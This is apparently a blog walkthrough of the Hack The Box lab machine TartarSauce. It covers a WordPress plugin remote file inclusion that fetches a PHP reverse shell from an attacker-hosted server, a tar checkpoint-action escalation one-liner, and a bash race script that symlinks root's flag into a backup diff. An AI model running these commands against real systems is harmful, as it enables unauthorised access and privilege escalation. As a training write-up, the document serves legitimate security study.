Hack The Box – TartarSauce Walkthrough

October 20, 2018


This week’s retiring machine is TartarSauce, which is full of rabbit holes deep enough to get stuck in.  With a rating of 6.2/10, it’s not the most difficult machine out there, but it definitely felt a little more complex to me than a 30-point box.  Either way, we get to experience another web exploit this week via a remote file inclusion (RFI), a tar checkpoint-action trick to escalate to another user, and finally abuse of a systemd timer to gain our root flag.  Let’s go ahead and get started!

Nmap Scan:

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-06 16:34 EDT
Nmap scan report for
Host is up (0.043s latency).
Not shown: 65534 closed ports

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

Network Distance: 2 hops

TRACEROUTE (using port 554/tcp)
1   44.69 ms
2   44.90 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.81 seconds

Looking at the initial scan, it appears we’re going to be dealing with a web application exploit and/or remote code execution to get a shell on the box (unless there is some sort of port-knocking or hidden UDP service).  It looks like we have quite a few sites in the robots.txt file, but I always like to venture out to the main website to see what we’re working with:


A big ol’ bottle of Tartar sauce is what we’re working with.  Viewing the source produces nothing.  My next step was to visit each of the links in the robots.txt file.  All rabbit holes!  I wasted quite a bit of time looking at the pages that actually resolved, as well as running dirb on a lot of the directories, with all paths leading to nowhere.

Clearly, this box had tricks up its sleeve, but all was not lost.  Looking at the robots.txt, I noticed a common directory: webservices.  I decided to run a scan against this directory to see if I could find any hidden sub-directories that could lead me down the true path to shell.  The command I ran was: dirb http://<target IP>/webservices/

This time around, I got the results that I was looking for:


A WordPress directory!  If you are new to hacking, WordPress is full of fun exploits that lead to RCE.  There’s a great tool called wpscan that will check for these exploits and report back on them.  The command that eventually worked for me was enumerating vulnerable plugins.  That command was: wpscan --url <target URL> --enumerate p

In the results of this scan was the Gwolle Guestbook plugin, which allows for RFI:


The exploit can be read about here: https://www.exploit-db.com/exploits/38861/

Essentially, we can host a malicious file and have the server reach out and execute it.  Since the server is running on Apache, we will need a PHP reverse shell file.  My favorite PHP reverse shell is courtesy of Pentest Monkey and can be found here: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

What’s great about the shell is we only need to change two lines, our IP and port, to make it work:


It is important to save the file as “wp-load.php” as that is what the exploit calls for.  I decided to host the file using Python with the command python -m SimpleHTTPServer 80, which serves an HTTP server out of the directory you run it in.
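As a quick sanity check that the hosting step works, here is a local round trip using Python 3’s http.server (the modern replacement for SimpleHTTPServer); the port and payload below are demo values only, since binding port 80 requires root:

```shell
# Serve a stand-in payload from a scratch directory and fetch it back.
demo=$(mktemp -d)
cd "$demo"
echo 'stand-in payload' > wp-load.php
python3 -m http.server 8000 --bind 127.0.0.1 &   # background web server
srv=$!
sleep 2                                          # give it a moment to start
out=$(curl -s http://127.0.0.1:8000/wp-load.php) # what the victim would fetch
kill "$srv"
echo "$out"
```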


With the HTTP server running, we also need to set up netcat to listen on the port we specified in our PHP shell.  In this instance, I used port 4444.  We can have netcat listen on this port by typing nc -nvlp 4444


With our netcat listening and our malicious PHP file ready, it is time to execute the RFI call.  According to the exploit, we should be executing it as such in our browser:
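Per the exploit-db advisory above, the vulnerable endpoint takes an abspath parameter and appends wp-load.php to whatever it is given; here is a sketch of the request, with the box IP, attacker IP, and WordPress path all placeholders:

```shell
target="10.10.10.88"    # hypothetical box IP
attacker="10.10.14.2"   # hypothetical attacker IP serving wp-load.php
rfi="http://${target}/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://${attacker}/"
echo "$rfi"             # visit this in the browser (or curl it)
```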

With this syntax, it should pull down the malicious file:


As well as provide a reverse shell:


Checking the user with whoami, I discover the shell is running as the user www-data, which is common during web exploitation.  We do not have the user flag at this point, so we must escalate to a different user.  A quick sudo -l to see our sudo privileges yields the following results:


It appears that we can run tar as the user onuma with sudo privileges.  Given the box is named TartarSauce, I have a hunch this is important to us.  A very quick Google search of “tar privilege escalation” yields a site that I believe to be the answer: http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/

Essentially, we can create an empty file (I’ll create a file named shell.sh in the /tmp folder) and run the following command:

sudo -u onuma /bin/tar cf /dev/null shell.sh --checkpoint=1 --checkpoint-action=exec=/bin/sh

This command will run sudo as the user onuma along with the privilege escalation technique provided by the article above.  Let’s give it a try:


Awesome, it worked!  We now have our user flag and can begin privilege escalation.
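If you want to see why this works, the checkpoint trick can be rehearsed locally with throwaway files (GNU tar assumed; nothing here touches the box): --checkpoint-action=exec runs an arbitrary command at each checkpoint, so sudo rights on tar are effectively sudo rights on any command.

```shell
tdir=$(mktemp -d)
cd "$tdir"
touch shell.sh                       # the empty file we feed to tar
# At the first checkpoint, tar runs our command instead of just archiving.
tar cf /dev/null shell.sh --checkpoint=1 --checkpoint-action=exec='touch proof.txt'
ls proof.txt                         # proof.txt existing shows the action fired
```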

In terms of privesc, I’ve heard rumblings of different ways to do it.  I’ve said in previous articles that when it comes to CTF, I am lazy and will do whatever is the easiest to capture the flag.  Sometimes, that means we do not even have to have a root shell to do so.  Let’s walk through that process.

While sitting on the Onuma shell, I tried pretty much all enumeration I could think of.  I investigated the shadow_bkp file you see above.  I ran all of my favorite enumeration scripts.  I dug pretty deep.  Eventually, I found something lurking in the shadows that is often not discussed: a systemd timer.

You can think of a systemd timer as basically a cron job.  It performs a task for the system on a timed basis.  In most enumeration scripts, a scan for this is left off.  We can run a command manually to see what timers are running on the system by typing systemctl list-timers
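For context, a systemd timer is just a pair of unit files: a .timer that fires on a schedule and a matching .service that does the work.  A hypothetical five-minute timer analogous to the one on this box might look like:

```ini
# backuperer.timer -- illustrative unit, not necessarily the box's exact file
[Unit]
Description=Runs backuperer every 5 mins

[Timer]
# Wait after boot before the first run
OnBootSec=5min
# Interval between consecutive runs
OnUnitActiveSec=5min
Unit=backuperer.service

[Install]
WantedBy=multi-user.target
```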


So, it appears that there is a service called “backuperer” running every five minutes.  This seems incredibly odd.  Let’s do a locate on backuperer and see what we can find:


Now, to cat the /usr/sbin/backuperer file:


#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check

if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

It really took me some time to read through this and understand completely what is going on.  Essentially, every five minutes a backup of the /var/www/html folder is created in /var/tmp.  The backup is then extracted, and an integrity check diffs the live files against the extracted copy, reporting any differences into an “onuma_backup_error.txt” file.  The script itself runs as root (only the tar step drops to the onuma user).  Here’s an example of what the error text file looks like:

Integrity Check Error in backup last ran : Fri Mar 9 15:40:10 EST 2018
Only in /var/www/html: index.html
Only in /var/www/html/webservices/monstra-3.0.4: admin
Only in /var/www/html/webservices/monstra-3.0.4: backups
Only in /var/www/html/webservices/monstra-3.0.4: boot
Only in /var/www/html/webservices/monstra-3.0.4: CHANGELOG.md
Only in /var/www/html/webservices/monstra-3.0.4: engine
Only in /var/www/html/webservices/monstra-3.0.4: favicon.ico
Only in /var/www/html/webservices/monstra-3.0.4: .gitignore
Only in /var/www/html/webservices/monstra-3.0.4: .htaccess
Only in /var/www/html/webservices/monstra-3.0.4: index_copy.php
Only in /var/www/html/webservices/monstra-3.0.4: index.php
Only in /var/www/html/webservices/monstra-3.0.4: libraries
Only in /var/www/html/webservices/monstra-3.0.4: LICENSE.md
Only in /var/www/html/webservices/monstra-3.0.4/plugins: blog
Only in /var/www/html/webservices/monstra-3.0.4/plugins: captcha
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: addon
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: AUTHORS
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: bower.json
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: .gitattributes
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: .gitignore
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: .htaccess
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: index.html
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: keymap
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: lib
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: LICENSE
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: apl
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: clike
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: cobol
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: coffeescript
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: commonlisp
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: css
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: d
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: eiffel
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: erlang
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: gas
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: groovy
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: htmlembedded
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: http
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: index.html
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: javascript
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: julia
diff -r /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode/less/index.html /var/tmp/check/var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode/less/index.html
< text-decoration: none;

If you follow closely, it lists the files it is checking and prints any differences it finds between files of the same name (as seen in the last few lines of the file).

So, what can we do with this information?  Well, it sounds like we need to get a file included in the backup and then change it before the integrity check runs, so the difference gets printed into the error output.  Because I’m lazy, the file I’m immediately interested in is the root.txt flag, which is typically stored in /root.  We need to somehow write the file into the /var/www/html directory, which means we will need to pop a shell again as www-data.

We can actually write the file using a symbolic link.  You can think of a symbolic link as the same thing as a shortcut in Windows.  We can basically store the information of root.txt into a file in the /var/www/html directory and then change the file to nothing when the backuperer timer executes.  This will create a difference of information that was already there (root.txt symbolic link) vs the empty file.
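The whole mechanism can be rehearsed locally with throwaway files (all paths here are stand-ins; GNU tar and diff assumed): tar stores a symlink as a symlink, extraction recreates it, and diff -r dereferences symlinks by default, so swapping the live symlink for an empty file makes the secret’s contents appear in the diff output:

```shell
work=$(mktemp -d)
cd "$work"
echo 'fake-flag-1234' > secret.txt     # stand-in for /root/root.txt
mkdir www                              # stand-in for /var/www/html
ln -s "$work/secret.txt" www/.heath    # the symlink tar will archive
tar -zcf backup.tgz www                # the symlink is stored, not its target
mkdir check
tar -zxf backup.tgz -C check           # extraction recreates the symlink
rm www/.heath && touch www/.heath      # swap: the live copy is now empty
diff -r www check/www || true          # diff follows the symlink and leaks the secret
```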

The timing of this was incredibly difficult.  While it is possible to achieve manually, it is much easier if we script it.  Shout out to my buddy Malvi for writing this:

cat >att.sh <<'EOF'
#!/bin/bash
ln -s /root/root.txt /var/www/html/.heath
stop=false
while [ "$stop" = "false" ]; do
       for i in $(ls -a /var/tmp/ | grep -E '^\.[0-9a-f]{40}$'); do
              stop=true
              echo $i
              for j in {1..10}; do /bin/sleep 1; printf '.'; done
              rm -f /var/www/html/.heath; touch /var/www/html/.heath
       done
       /bin/sleep 5; printf '+'
done

for i in {1..20}; do /bin/sleep 1; printf '.'; done
cat /var/backups/onuma_backup_error.txt
EOF

Looking at the script may provide a better idea of what’s going on.  We create a symbolic link named “.heath” in the /var/www/html folder pointing at the root.txt file.  We then run a while loop that waits until a backup archive has been created in /var/tmp (the backup file has a randomly generated name, so we grep for its hidden 40-character hex pattern).  Once the archive is found, the script waits for tar to finish, removes the symbolically linked file, and adds a new empty file with the touch command.  It then waits a bit longer for the integrity check to run and cats out the error file to see the results.

We don’t necessarily have to create a new file here.  We could just as well overwrite the index.html file and achieve the same results.  I have been asked not to display flags, so here is what the result would look like with the flag removed:



This box provided a roller coaster of emotions for me.  I do believe the point value should have been 40 points instead of 30.  There were a lot of rabbit holes and no blatantly obvious exploits.  When WordPress was found, there were still many vulnerabilities to look into.  Discovering the timed service wasn’t particularly easy, nor was timing the symbolic-link swap to obtain the flag.

With that being said, I enjoyed this box.  I find that not all machines are realistic on HTB, but you do learn a lesson from each of them.  While I’ll likely never find a WordPress Guestbook exploit in a penetration test, using tar to escalate privileges seems incredibly useful.  I will tuck that trick away in my hacking notes for sure!

Wanna chat? Add me on Twitter, YouTube or LinkedIn!
Veteran? Join our Slack!